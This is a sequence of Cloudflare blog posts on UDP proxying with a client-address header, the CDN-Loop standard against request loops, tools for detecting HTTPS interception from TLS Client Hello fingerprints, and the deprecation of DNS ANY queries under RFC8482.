CloudFlare Blog

Spectrum for UDP: DDoS protection and firewalling for unreliable protocols

Today, we're announcing Spectrum for UDP. Spectrum for UDP works the same way as Spectrum for TCP: Spectrum sits between your clients and your origin. Incoming connections are proxied through, whilst our DDoS protection and IP Firewall rules are applied. This allows you to protect your services from all sorts of nasty attacks and completely hides your origin behind Cloudflare.

Last year, we launched Spectrum. Spectrum brought the power of our DDoS and firewall features to all TCP ports and services. Spectrum for TCP allows you to protect your SSH services, gaming protocols, and as of last month, even FTP servers. We've seen customers running all sorts of applications behind Spectrum, such as Bitfly, Nicehash, and Hypixel.

This is great if you're running TCP services, but plenty of our customers also have workloads running over UDP. As an example, many multiplayer games prefer the low cost and lighter weight of UDP and don't care whether packets arrive or not.

UDP applications have historically been hard to protect and secure, which is why we built Spectrum for UDP. Spectrum for UDP allows you to protect standard UDP services (such as RDP over UDP), but can also protect any custom protocol you come up with! The only requirement is that it uses UDP as the underlying protocol.

Configuring a UDP application on Spectrum

To configure on the dashboard, simply switch the application type from TCP to UDP:

Retrieving client information

With Spectrum, we terminate the connection and open a new one to your origin. But what if you still want to see who's actually connecting to you? For TCP, there's Proxy Protocol. Whilst initially introduced by HAProxy, it has since been adopted by other parties, such as nginx. We added support in late 2018, allowing you to easily read the client's IP and port from a header that precedes each data stream.

Unfortunately, there is no equivalent for UDP, so we're rolling our own.
Because UDP is connection-less, we can't get away with the approach Proxy Protocol takes for TCP, which prepends the entire stream with a single header. Instead, we have to prepend each packet with a small header that specifies:

- the original client IP
- the Spectrum IP
- the original client port
- the Spectrum port

Schema representing a UDP packet prefaced with our Simple Proxy Protocol header:

```
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|          Magic Number         |                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+                               +
|                                                               |
+                                                               +
|                         Client Address                        |
+                                                               +
|                                                               |
+                               +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                               |                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+                               +
|                                                               |
+                                                               +
|                         Proxy Address                         |
+                                                               +
|                                                               |
+                               +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                               |          Client Port          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Proxy Port          |           Payload ...         |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```

Simple Proxy Protocol is turned off by default, which means UDP packets will arrive at your origin as if they were sent from Spectrum. To use it, just enable it on your Spectrum app.

Getting access to Spectrum for UDP

We're excited about launching this, and even more excited to see what you'll build and protect with it. In fact, what if you could build serverless services on Spectrum, without actually having an origin running? Stay tuned for some cool announcements in the near future.

Spectrum for UDP is currently an Enterprise-only feature. To get UDP enabled for your account, please reach out to your account team and we'll get you set up.

One more thing... if you're at GDC this year, say hello at booth P1639! We'd love to talk more and learn about what you'd like to do with Spectrum.
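As a closing aside for origin implementers: the header layout described above is straightforward to consume. Below is a minimal Python sketch of parsing a Simple Proxy Protocol datagram, assuming the field sizes shown in the diagram (16-bit magic number, 16-byte addresses with IPv4 carried as IPv4-mapped IPv6, 16-bit ports). The magic-number constant used here is a placeholder, not necessarily the value Spectrum actually sends; check the Spectrum documentation for the real constant.

```python
import ipaddress
import struct

# Placeholder magic value -- an assumption for this sketch, not Spectrum's.
SPP_MAGIC = 0x56EC
SPP_HEADER_LEN = 38  # 2 + 16 + 16 + 2 + 2 bytes

def parse_spp(datagram: bytes):
    """Split a Simple-Proxy-Protocol-prefixed UDP datagram into
    (client_addr, proxy_addr, client_port, proxy_port, payload).

    Addresses are carried as 16-byte values (IPv4 appears as an
    IPv4-mapped IPv6 address), matching the diagram above.
    """
    if len(datagram) < SPP_HEADER_LEN:
        raise ValueError("datagram shorter than SPP header")
    (magic,) = struct.unpack_from("!H", datagram, 0)
    if magic != SPP_MAGIC:
        raise ValueError("bad magic number")
    client_addr = ipaddress.ip_address(datagram[2:18])
    proxy_addr = ipaddress.ip_address(datagram[18:34])
    client_port, proxy_port = struct.unpack_from("!HH", datagram, 34)
    return client_addr, proxy_addr, client_port, proxy_port, datagram[38:]
```

An origin would call `parse_spp` on each received datagram, use the client address for logging or access control, and treat the remaining bytes as the application payload.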

Preventing Request Loops Using CDN-Loop

HTTP requests typically originate with a client and end at a web server that processes the request and returns some response. Such requests may pass through multiple proxies before they arrive at the requested resource. If one of these proxies is configured badly (for instance, it forwards the request back to a proxy that had already processed it) then the request may be caught in a loop.

Request loops, accidental or malicious, can consume resources and degrade users' Internet performance. Such loops can even be observed at the CDN level, and a wide-scale attack at that level would affect all customers of that CDN.

It's been over three years since Cloudflare acknowledged the power of such non-compliant or malicious request loops. The solution proposed in that blog post was quickly found to be flawed, and loop protection has since been implemented in an ad-hoc manner that is specific to each individual provider. This lack of cohesion and co-operation has led to a fragmented set of protection mechanisms.

We are finally happy to report that a recent collaboration between multiple CDN providers (including Cloudflare) has led to a new mechanism for loop protection. This now runs at the Cloudflare edge and interoperates with other CDNs, allowing us to provide protection against loops. The loop protection mechanism is currently a draft item being worked on by the HTTPbis working group. It will be published as an RFC on the standards track in the near future.

The original problem

The original problem was summarised really nicely in the previous blog post, but I will summarise it again here (with some diagrams that are suspiciously similar to the original post, sorry Nick!).

As you may well know, Cloudflare is a reverse proxy. When requests are made for Cloudflare websites, the Cloudflare edge returns origin content via a cached response or by making requests to the origin web server. Some Cloudflare customers choose to use different CDN providers for different facets of functionality.
This means that requests go through multiple proxy services before origin content is received from the origin.

This is where things can sometimes get messy, either through misconfiguration or deliberately. It's possible to configure multiple proxy services for a given origin in a loop. For example, an origin website could configure proxy A so that proxy B is the origin, and B such that A is the origin. Any request sent to the origin would then get caught in a loop between the two proxies (see above). If such a loop goes undetected, it can quickly eat the computing resources of the two proxies, especially if the request requires a lot of processing at the edge. In these cases, it is conceivable that such an attack could lead to a DoS on one or both of the proxy services. Indeed, a research paper from NDSS 2016 showed that such an attack was practical when leveraging multiple CDN providers (including Cloudflare) in the manner shown above.

The original solution

The previous blog post advocated using the Via header on HTTP requests to log the proxy services that had previously processed a request. This header is specified in RFC7230 and is purpose-built for providing request loop detection. The idea was that CDN providers would log each pass of a request through their edge architecture in the Via header. Any request that arrived at the edge would be checked, using the value of the Via header, to see whether it had previously passed through the same CDN. If the header indicated that it had, the request could be dropped before any serious processing took place.

Nick's previous post finished with a call-to-arms for all services proxying requests to be compliant with the standard.

The problem with Via

In theory, the Via header would solve the loop protection problem. In practice, it was quickly discovered that there were issues with the implementation of Via that made using the header infeasible.
Adding the header to outbound requests from the Cloudflare edge had grave performance consequences for a large number of Cloudflare customers. These issues arose from legacy usage of the Via header that conflicts with using it for loop detection. For instance, around 8% of Cloudflare enterprise customers experienced issues where gzip failed to compress responses to requests containing the Via header. This meant that transported responses were much larger and led to wide-scale problems for their web servers. Such performance degradation is even expected in some server implementations. For example, NGINX actively chooses not to compress responses to proxied requests:

> By default, NGINX does not compress responses to proxied requests (requests that come from the proxy server). The fact that a request comes from a proxy server is determined by the presence of the Via header field in the request.

While Cloudflare takes security very seriously, such performance issues were unacceptable. The difficult decision was taken to switch off loop protection based on the contents of the Via header shortly after it was implemented.

Since then, Cloudflare has implemented loop protection based on the CF-Connecting-IP and X-Forwarded-For headers. In essence, when a request is processed by the edge, these headers are added to the request before it is sent to the origin. Any request that arrives at the edge already carrying either of these headers is then dropped. While this is enough to avoid malicious loop attacks, the approach has some disadvantages.

Firstly, it naturally means that there is no unified way of approaching loop protection across the different CDN providers.
Without a standardised method, the possibility rises of implementation mistakes that could cause problems in the future.

Secondly, there are some valid reasons why Cloudflare customers may require requests to loop through the edge more than once. While such reasons are usually quite esoteric, customers with such a need had to manually modify those requests so that they did not fall foul of the loop protection mechanism. For example, workflows that use Cloudflare Workers can send requests through the edge more than once via subrequests that return custom content to clients. The headers that are currently used mean that requests are dropped as soon as a request loops once. This can add noticeable friction to using CDN services, and a more granular solution to loop detection would be preferable.

A new solution

Collaborators at Cloudflare, Fastly and Akamai set about defining a unified solution to the loop protection problem for CDNs. The output was this draft, which has recently been accepted by the HTTPbis working group on the Standards Track. Once the document has been approved by the IESG, it will join the RFC series.

The CDN-Loop header sets out a syntax that allows individual CDNs to mark requests as having been processed by their edge. This header should be added to any request that passes through the CDN architecture towards some separate endpoint. The current draft defines the syntax of the header as follows:

```
CDN-Loop  = #cdn-info
cdn-info  = cdn-id *( OWS ";" OWS parameter )
cdn-id    = ( uri-host [ ":" port ] ) / pseudonym
pseudonym = token
```

This initially seems a lot to unpack. Essentially, cdn-id is a URI host ID for the destination resource, or a pseudonym related to the CDN that has processed the request. In the Cloudflare case, we might choose pseudonym = cloudflare, or use the URI host ID for the origin website that has been requested. Then, cdn-info contains the cdn-id in addition to some optional parameters.
This is denoted by *( OWS ";" OWS parameter ), where OWS represents optional whitespace and parameter represents any CDN-specific information that may be informative for the specific request. If cdn-info entries for different CDNs are included in the same header, they are comma-separated. For example, we may have cdn-info = cdn1; param1, cdn2; param2 for two different CDNs that have interacted with the request.

Concretely, we give some examples to describe how the CDN-Loop header may be used by a CDN to mark requests as being processed.

If a request arrives at CDN A with no current CDN-Loop header, then A processes the request and adds

CDN-Loop: cdn-info(A)

to the request headers.

If a request arrives at A with the following header for some different CDN B:

CDN-Loop: cdn-info(B)

then A either modifies the header to be

CDN-Loop: cdn-info(B), cdn-info(A)

or adds a separate header:

CDN-Loop: cdn-info(B)
CDN-Loop: cdn-info(A)

If a request arrives at A with

CDN-Loop: cdn-info(A)

this indicates that the request has already been processed. At this point A detects a loop and may implement loop protection in accordance with its own policies. This is an implementation decision that is not defined in the specification. Options include dropping the request or simply re-marking it, for example:

CDN-Loop: cdn-info(A); cdn-info(A)

A CDN could also use the optional parameters to indicate that a request had been processed:

CDN-Loop: cdn-info(A); processed=1

The ability to use different parameters in the header allows for much more granular loop detection and protection. For example, a CDN could drop requests only after they have looped N>1 times, rather than after the first loop. In addition, the CDN-Loop header has the advantage of carrying no legacy baggage.
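To make the marking-and-detection flow concrete, here is a hedged Python sketch of how a responder might process the header. This is a hypothetical illustration of the mechanism, not Cloudflare's actual implementation, and real parsing must follow the ABNF more carefully than this string splitting does (quoted parameter values may contain commas, for instance).

```python
def parse_cdn_ids(header_values):
    """Extract the cdn-id from each cdn-info element across one or
    more CDN-Loop field values (each value is a comma-separated list)."""
    ids = []
    for value in header_values:
        for info in value.split(","):
            info = info.strip()
            if info:
                # cdn-id is everything before the first ";"-delimited
                # parameter. NOTE: a real parser must honour the ABNF;
                # this split is only a sketch.
                ids.append(info.split(";", 1)[0].strip().lower())
    return ids

def process(header_values, own_id="cloudflare", max_loops=1):
    """Drop the request once our own cdn-id already appears max_loops
    times; otherwise forward it with our mark appended as a new value."""
    if parse_cdn_ids(header_values).count(own_id) >= max_loops:
        return "drop", header_values
    return "forward", header_values + [own_id]
```

Raising `max_loops` is what permits the "loop N>1 times before dropping" policy described above.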
As we experienced previously, loop detection based on the Via header can conflict with existing usage of the header in web server implementations, eventually leading to compression issues and performance degradation. This makes CDN-Loop a viable and effective solution for detecting loop attacks and applying preventions where needed.

Implementing CDN-Loop at Cloudflare

The IETF standardisation process welcomes running code and implementation experience in the real world. Cloudflare recently added support for the CDN-Loop header to requests that pass through the Cloudflare edge. This replaces the CF-Connecting-IP and X-Forwarded-For headers as the primary means of establishing loop protection. The structure that Cloudflare uses is similar to the examples above, with cdn-info = cloudflare. Extra parameters can be added to the header to determine how many times a request has been processed and in what manner.

The Cloudflare edge drops any requests that have been processed too many times, preventing malicious loop attacks. In the diagram above, requests that have looped more times than a given CDN allows (red arrows) are dropped and an error is returned to the client. The edge can decide to allow requests to loop more than once in certain situations, rather than dropping them immediately after the first loop.

A (second) call-to-arms

Cloudflare previously made a call-to-arms to use the Via header across the industry to prevent malicious usage of proxies for request looping. This did not turn out as we hoped, for the reasons mentioned above. With CDN-Loop, we believe there is finally a way for CDNs to block loop attacks in a standardised and generic manner that fits with other existing implementations.

CDN-Loop is actively supported by Cloudflare, and there have been none of the performance issues that came with the usage of Via.
Recently another CDN, Fastly, introduced usage of the CDN-Loop header for their own edge-based loop protection. We believe that this could be the start of a wider movement, and that it would be advantageous for all reverse proxies and CDN-like providers to implement compliant usage of the CDN-Loop header.

While the original solution three years ago was very different, what Nick said at the time is still salient for all CDNs globally: let's work together to avoid request loops.

Special thanks to Stephen Ludin, Mark Nottingham and Nick Sullivan for their work in drafting and improving the CDN-Loop specification. We would also like to extend thanks to the HTTPbis working group for their advice during the standardisation process.

Monsters in the Middleboxes: Introducing Two New Tools for Detecting HTTPS Interception

The practice of HTTPS interception continues to be commonplace on the Internet. HTTPS interception has encountered scrutiny, most notably in the 2017 study "The Security Impact of HTTPS Interception" and the United States Computer Emergency Readiness Team (US-CERT) warning that the technique weakens security. In this blog post, we provide a brief recap of HTTPS interception and introduce two new tools:

- MITMEngine, an open-source library for HTTPS interception detection, and
- MALCOLM, a dashboard displaying metrics about HTTPS interception we observe on Cloudflare's network.

In a basic HTTPS connection, a browser (client) establishes a TLS connection directly to an origin server to send requests and download content. However, many connections on the Internet are not made directly from a browser to the server serving the website, but instead traverse some type of proxy or middlebox (a "monster-in-the-middle" or MITM). There are many reasons for this behavior, both malicious and benign.

Types of HTTPS Interception, as Demonstrated by Various Monsters in the Middle

One common HTTPS interceptor is the TLS-terminating forward proxy. (These are a subset of all forward proxies; non-TLS-terminating forward proxies forward TLS connections without any ability to inspect encrypted traffic.) A TLS-terminating forward proxy sits in front of a client in a TLS connection, transparently forwarding and possibly modifying traffic from the browser to the destination server. To do this, the proxy must terminate the TLS connection from the client, and then (hopefully) re-encrypt and forward the payload to the destination server over a new TLS connection. To allow the connection to be intercepted without a browser certificate warning appearing at the client, forward proxies often require users to install a root certificate on their machine so that the proxy can generate and present to the browser a trusted certificate for the destination.
These root certificates are often installed on corporate managed devices by network administrators, without user intervention.

Antivirus and Corporate Proxies

Some legitimate reasons for a client to connect through a forward proxy include allowing antivirus software or a corporate proxy to inspect otherwise encrypted data entering and leaving a local network, in order to detect inappropriate content, malware, and data breaches. The Blue Coat data loss prevention tools offered by Symantec are one example. In this case, HTTPS interception occurs to check whether an employee is leaking sensitive information before the request is sent to its intended destination.

Malware Proxies

Malicious forward proxies, however, might insert advertisements into web pages or exfiltrate private user information. Malware like Superfish inserts targeted ads into encrypted traffic, which requires intercepting HTTPS traffic and modifying the content of the response given to a client.

Leaky Proxies

Any TLS-terminating forward proxy, whether well-intentioned or not, also risks exposing private information and opens the door to spoofing. When a proxy root certificate is installed, Internet browsers lose the ability to validate the connection end-to-end, and must trust the proxy to maintain the security of the connection and ensure that sensitive data is protected. Some proxies re-encrypt and forward traffic to destinations using less secure TLS parameters. Proxies can also require the installation of vendor root certificates that can easily be abused by other malicious parties. In November 2018, a type of Sennheiser wireless headphones required the user to install a root certificate that used insecure parameters. This root certificate could allow any adversary to impersonate websites and send spoofed responses to machines with this certificate, as well as observe otherwise encrypted data.
TLS-terminating forward proxies could even trust root certificates considered insecure, like Symantec's CA. If poorly implemented, any TLS-terminating forward proxy can become a widespread attack vector, leaking private information or allowing for response spoofing.

Reverse Proxies

Reverse proxies also sit between users and origin servers. Reverse proxies (such as Cloudflare and Akamai) act on behalf of origin servers, caching static data to improve the speed of content delivery and offering security services such as DDoS mitigation. Critically, reverse proxies do not require special root certificates to be installed on user devices, since browsers establish connections directly to the reverse proxy to download content that is hosted at the origin server. Reverse proxies are often used by origin servers to improve the security of client HTTPS connections (for example, by enforcing strict security policies and using the newest security protocols like TLS 1.3). In this case, reverse proxies are intermediaries that provide better performance and security for TLS connections.

Why Continue Examining HTTPS Interception?

In a previous blog post, we argued that HTTPS interception is prevalent on the Internet and that it often degrades the security of Internet connections. A server that refuses to negotiate weak cryptographic parameters should be safe from many of the risks of degraded connection security, but there are plenty of reasons why a server operator may want to know whether HTTPS traffic from its clients has been intercepted.

First, detecting HTTPS interception can help a server identify suspicious or potentially vulnerable clients connecting to its network. A server can use this knowledge to notify legitimate users that their connection security might be degraded or compromised.
HTTPS interception also increases the attack surface of the system and presents an attractive target for attackers seeking access to sensitive connection data.

Second, the presence of content inspection systems not only weakens the security of TLS connections, but can also hinder the adoption of new innovations and improvements to TLS. Users connecting through older middleboxes may have their connections downgraded to older versions of TLS that the middleboxes still support, and may not receive the security, privacy, and performance benefits of new TLS versions, even if the newer versions are supported by both the browser and the server.

Introducing MITMEngine: Cloudflare's HTTPS Interception Detector

Many TLS client implementations can be uniquely identified by features of the Client Hello message such as the supported version, cipher suites, extensions, elliptic curves, point formats, compression, and signature algorithms. The technique introduced by "The Security Impact of HTTPS Interception" is to construct TLS Client Hello signatures for common browser and middlebox implementations. To identify HTTPS requests that have been intercepted, a server can then look up the signature corresponding to the request's HTTP User Agent and check whether the request's Client Hello message matches that signature. A mismatch indicates either a spoofed User Agent or an intercepted HTTPS connection. The server can also compare the request's Client Hello to those of known HTTPS interception tools to understand which interceptors are responsible for intercepting the traffic.

The Caddy Server MITM Detection tool is based on these heuristics and implements support for a limited set of browser versions.
However, we wanted a tool that could be easily applied to the broad set of TLS implementations that Cloudflare supports, with the following goals:

- Maintainability: It should be easy to add support for new browsers and to update existing browser signatures when browser updates are released.
- Flexibility: Signatures should be able to capture a wide variety of TLS client behavior without being overly broad. For example, signatures should be able to account for the GREASE values sent in modern versions of Chrome.
- Performance: Per-request MITM detection should be cheap so that the system can be deployed at scale.

To accomplish these goals, the Cryptography team at Cloudflare developed MITMEngine, an open-source HTTPS interception detector. MITMEngine is a Golang library that ingests User Agents and TLS Client Hello fingerprints, then returns the likelihood of HTTPS interception and the factors used to identify interception. To learn how to use MITMEngine, check out the project on GitHub.

MITMEngine works by comparing the values in an observed TLS Client Hello to a set of known browser Client Hellos. The fields compared include:

- TLS version,
- Cipher suites,
- Extensions and their values,
- Supported elliptic curve groups, and
- Elliptic curve point formats.

When given a pair of User Agent and observed TLS Client Hello, MITMEngine detects differences between the given Client Hello and the one expected for the presented User Agent. For example, consider the following User Agent:

```
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
```

This User Agent corresponds to Chrome 47 running on Windows 7. The paired TLS Client Hello includes the following cipher suites, displayed below as a hex dump:

```
0000  c0 2b c0 2f 00 9e c0 0a  c0 14 00 39 c0 09 c0 13   .+./.... ...9....
0010  00 33 00 9c 00 35 00 2f  00 0a                     .3...5./ ..
```
These cipher suites translate to the following ordered list of 13 ciphers:

```
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 (0xc02b)
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02f)
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 (0x009e)
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA (0xc00a)
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA (0xc014)
TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA (0xc009)
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013)
TLS_DHE_RSA_WITH_AES_128_CBC_SHA (0x0033)
TLS_RSA_WITH_AES_128_GCM_SHA256 (0x009c)
TLS_RSA_WITH_AES_256_CBC_SHA (0x0035)
TLS_RSA_WITH_AES_128_CBC_SHA (0x002f)
TLS_RSA_WITH_3DES_EDE_CBC_SHA (0x000a)
```

The reference TLS Client Hello cipher suites for Chrome 47 are the following:

```
0000  c0 2b c0 2f 00 9e cc 14  cc 13 c0 0a c0 14 00 39   .+./.... .......9
0010  c0 09 c0 13 00 33 00 9c  00 35 00 2f 00 0a         .....3.. .5./..
```

Looking closely, we see that the cipher suite list for the observed traffic is shorter than we expect for Chrome 47; two cipher suites have been removed, though the remaining cipher suites remain in the same order. The two missing cipher suites are:

```
TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 (0xcc14)
TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 (0xcc13)
```

Chrome prioritizes these two ChaCha ciphers above the AES-CBC ciphers, a good choice given that CBC (cipher block chaining) mode is vulnerable to padding oracle attacks. It looks like the traffic we received underwent HTTPS interception, and the interceptor potentially didn't support ChaCha ciphers.

Using contextual clues like the cipher suites in use, as well as additional User Agent text, we can also detect which software was used to intercept the HTTPS connection. In this case, MITMEngine recognizes that the observed fingerprint actually matches a fingerprint collected from Sophos antivirus software, and indicates that this software is the likely cause of the interception.

We welcome contributions to MITMEngine.
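As an aside, the by-hand comparison above, checking that the observed cipher-suite list is an order-preserving subset of the reference list for the browser, can be sketched in a few lines of Python. The reference values come from the Chrome 47 hex dump above; real MITMEngine signatures also cover extensions, curves, point formats, and more.

```python
# Cipher-suite IDs from the Chrome 47 reference hex dump above.
CHROME_47_REFERENCE = [
    0xc02b, 0xc02f, 0x009e, 0xcc14, 0xcc13, 0xc00a, 0xc014, 0x0039,
    0xc009, 0xc013, 0x0033, 0x009c, 0x0035, 0x002f, 0x000a,
]

def is_order_preserving_subset(observed, reference):
    """True if every observed cipher appears in the reference list in the
    same relative order (ciphers may be dropped, but not reordered or added)."""
    it = iter(reference)
    return all(cipher in it for cipher in observed)

# The observed Client Hello from the example, missing the two ChaCha suites.
observed = [
    0xc02b, 0xc02f, 0x009e, 0xc00a, 0xc014, 0x0039, 0xc009, 0xc013,
    0x0033, 0x009c, 0x0035, 0x002f, 0x000a,
]

# Which reference ciphers did the (possible) interceptor strip out?
missing = [c for c in CHROME_47_REFERENCE if c not in observed]
```

Here `missing` recovers exactly the two ChaCha suites, while an added or reordered cipher would make the subset check fail and flag the handshake as not matching the browser's signature.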
We are particularly interested in collecting more fingerprints of MITM software and browser TLS Client Hellos, because MITMEngine depends on these reference fingerprints to detect HTTPS interception. Contributing these fingerprints is as simple as opening Wireshark, capturing a pcap file with a TLS Client Hello, and submitting the pcap file in a PR. More instructions on how to contribute can be found in the MITMEngine documentation.

Observing HTTPS Interception on Cloudflare's Network with MALCOLM

To complement MITMEngine, we also built a dashboard, MALCOLM, which applies MITMEngine to a sample of Cloudflare's overall traffic to observe HTTPS interception in the requests hitting our network. Recent MALCOLM data incorporates a fresh set of reference TLS Client Hellos, so readers will notice that the percentage of "unknown" instances of HTTPS interception decreased from February 2019 to March 2019.

In this section of the blog post, we compare HTTPS interception statistics from MALCOLM to the 2017 study "The Security Impact of HTTPS Interception". With this data, we can see how the HTTPS interception patterns observed by Cloudflare have changed over the past two years.

Using MALCOLM, let's see how HTTPS connections have been intercepted as of late. This MALCOLM data was collected between March 12 and March 13, 2019. The 2017 study found that 10.9% of Cloudflare-bound TLS Client Hellos had been intercepted. MALCOLM shows that the proportion of interceptions has increased substantially, to 18.6%:

This result, however, is likely inflated compared to the results of the 2017 study. The 2017 study considered all traffic that went through Cloudflare, regardless of whether it had a recognizable User Agent or not. MALCOLM only considers requests with recognizable User Agents that could be identified by uasurfer, a Golang library for parsing User Agent strings.
Indeed, when we don't screen out TLS Client Hellos with unidentified User Agents, we see that 11.3% of requests are considered intercepted, an increase of only 0.4 percentage points over the 2017 figure. Overall, the prevalence of HTTPS interception activity does not seem to have changed much over the past two years.

Next, we examine the prevalence of HTTPS interception by browser and operating system. The paper presented the following table. We're interested in finding the most popular browsers and the most frequently intercepted browsers.

MALCOLM yields the following statistics for all traffic by browser. MALCOLM presents mobile and desktop browsers as a single item; this can be broken into separate views for desktop and mobile using the filters on the dashboard.

Chrome usage has expanded substantially since 2017, while usage of Safari, IE, and Firefox has fallen somewhat (here, IE includes Edge). Examining the most frequently intercepted browsers, we see the following results:

We see above that Chrome again accounts for a larger percentage of intercepted traffic, likely owing to growth in Chrome's general popularity. As a result, HTTPS interception rates for other browsers, like Internet Explorer, have fallen as IE is less frequently used. MALCOLM also highlights the prevalence of other browsers that have their traffic intercepted, most notably UCBrowser, a browser common in China.

Now, we examine the most common operating systems observed in Cloudflare's traffic:

Android use has clearly increased over the past two years as smartphones have become people's primary device for accessing the Internet.
Windows also remains a common operating system.

As Android becomes more popular, the likelihood of HTTPS interception occurring on Android devices has also increased substantially:

Since 2017, Android devices have overtaken Windows devices as the most intercepted. As more of the world's Internet consumption occurs through mobile devices, it's important to acknowledge that simply changing platforms and browsers has not impacted the prevalence of HTTPS interception.

Conclusion

Using MITMEngine and MALCOLM, we've been able to continuously track the state of HTTPS interception on over 10% of Internet traffic. It's imperative that we track the status of HTTPS interception to give us foresight when deploying new security measures and to detect breaking changes in security protocols. Tracking HTTPS interception also helps us contribute to our broader mission of "helping to build a better Internet" by keeping tabs on software that possibly weakens good security practices.

Interested in exploring more HTTPS interception data? Here are a couple of next steps:

- Check out MALCOLM, click on a couple of percentage bars to apply filters, and share any interesting HTTPS interception patterns you see!
- Experiment with MITMEngine today, and see if TLS connections to your website have been impacted by HTTPS interception.
- Contribute to MITMEngine!

RFC8482 - Saying goodbye to ANY

Ladies and gentlemen, I would like you to welcome the new shiny RFC8482, which effectively deprecates the DNS ANY query type. DNS ANY was a "meta-query": think of it as similar to the common A, AAAA, MX or SRV query types, but unlike these it wasn't a real query type; it was special. Unlike the standard query types, ANY didn't age well. It was hard to implement on modern DNS servers, its semantics were poorly understood by the community, and it unnecessarily exposed the DNS protocol to abuse. RFC8482 allows us to clean it up, and that's a good thing.

But let's rewind a bit.

Historical context

It all started in 2015, when we were looking at the code of our authoritative DNS server. The code flow was generally fine, but it was all peppered with naughty statements like this:

```
if qtype == "ANY" {
    // special case
}
```

This special-case code was ugly and error prone, which got us thinking: do we really need it? "ANY" is not a popular query type; no legitimate software uses it (with the notable exception of qmail).

Image by Christopher Michel, CC BY 2.0

ANY is hard for modern DNS servers

"ANY" queries, also called "* queries" in old RFCs, are supposed to return "all records" (citing RFC1035). There are two problems with this notion.

First, it assumes the server is able to retrieve "all records". In our implementation, we can't. Our DNS server, like many modern implementations, doesn't have a single "zone" file listing all properties of a DNS zone. This design allows us to respond fast and with information that is always up to date, but it makes it incredibly hard to retrieve "all records". Correct handling of "ANY" adds unreasonable code complexity for an obscure, rarely used query type.

Second, many of our DNS responses are generated on demand. To mention just two use cases:

- Some of our DNS responses are based on location
- We use black lies and DNS shotgun for DNSSEC

Storing data in modern databases and dynamically generating responses poses a fundamental problem for ANY.
ANY is hard for clients

Around the same time a catastrophe happened - Firefox started shipping DNS code that issued "ANY" queries. The intention was, as usual, benign. Firefox developers wanted to get the TTL value for A and AAAA queries. To cite DNS guru Andrew Sullivan:

In general, ANY is useful for troubleshooting but should never be used for regular operation. Its output is unpredictable given the effects of caches. It can return enormous result sets.

In user code you can't rely on anything sane coming out of an "ANY" query. While an "ANY" query has somewhat defined semantics on the DNS authoritative side, it's undefined on the DNS resolver side. Such a query can confuse the resolver:

- Should it forward the "ANY" query to the authoritative?
- Should it respond with any record that is already in cache?
- Should it do some mixture of the above behaviors?
- Should it cache the result of an "ANY" query and re-use the data for other queries?

Different implementations do different things. "ANY" does not mean "ALL", which is the main source of confusion. To our joy, Firefox quickly backpedaled on the change and stopped issuing ANY queries.

ANY is hard for network operators

Since an "ANY" query can generate a large response, they were often used for DNS reflection attacks: an authoritative provider receives a spoofed ANY query and sends the large answer to a target, potentially causing DoS damage. A typical attack of this kind was a 50Gbps DNS amplification targeting one of our customers; the attack lasted about 4 hours. We have blogged about this many times:

- The DDoS that knocked Spamhaus offline
- Deep inside a DNS amplification attack
- Reflections on reflections
- How the CPSC is inadvertently behind the largest attacks

The DoS problem with ANY is really old - here is a discussion from 2013 about a patch tweaking ANY handling in BIND. There is also a second angle to the ANY DoS problem.
Some reports suggested that performant DNS servers (authoritative or resolvers) can fill their outbound network capacity with a large number of ANY responses. The recommendation is simple: network operators must use response rate limiting when answering large DNS queries, otherwise they pose a DoS threat. The "ANY" query type just happens to often produce such large responses, while providing little value to legitimate users.

Killing ANY

In 2015, frustrated with the experience, we announced we would like to stop answering "ANY" queries and wrote a (controversial at the time) blog post: Deprecating DNS ANY meta-query type. A year later we followed up explaining possible solutions: What happened next - the deprecation of ANY. And here we are today! With RFC8482 we have a proposed-standard RFC clarifying that controversial query type. ANY queries are background noise; under normal circumstances, we see a very small volume of them.

The future for our users

What precisely can be done about "ANY" queries? RFC8482 specifies that:

A DNS responder that receives an ANY query MAY decline to provide a conventional ANY response or MAY instead send a response with a single RRset (or a larger subset of available RRsets) in the answer section.

This clearly defines the corner case: from now on, the authoritative server may respond with, well, any record type to an "ANY" query. Sometimes simple stuff like this matters most. This opens a gate for implementers - we can prepare a simple answer to these queries. As an implementer you may stick "A", "AAAA", or anything else in the response if you wish. Furthermore, the spec recommends returning the special (and rarely used thus far) HINFO type. This is in fact what we do:

$ dig ANY
;; ANSWER SECTION:
3789 IN HINFO "ANY obsoleted" "See draft-ietf-dnsop-refuse-any"

Oh, we need to update the message to mention the fresh RFC number! NS1 agrees with our implementation:

$ dig ANY
;; ANSWER SECTION:
3600 IN HINFO "ANY not supported."
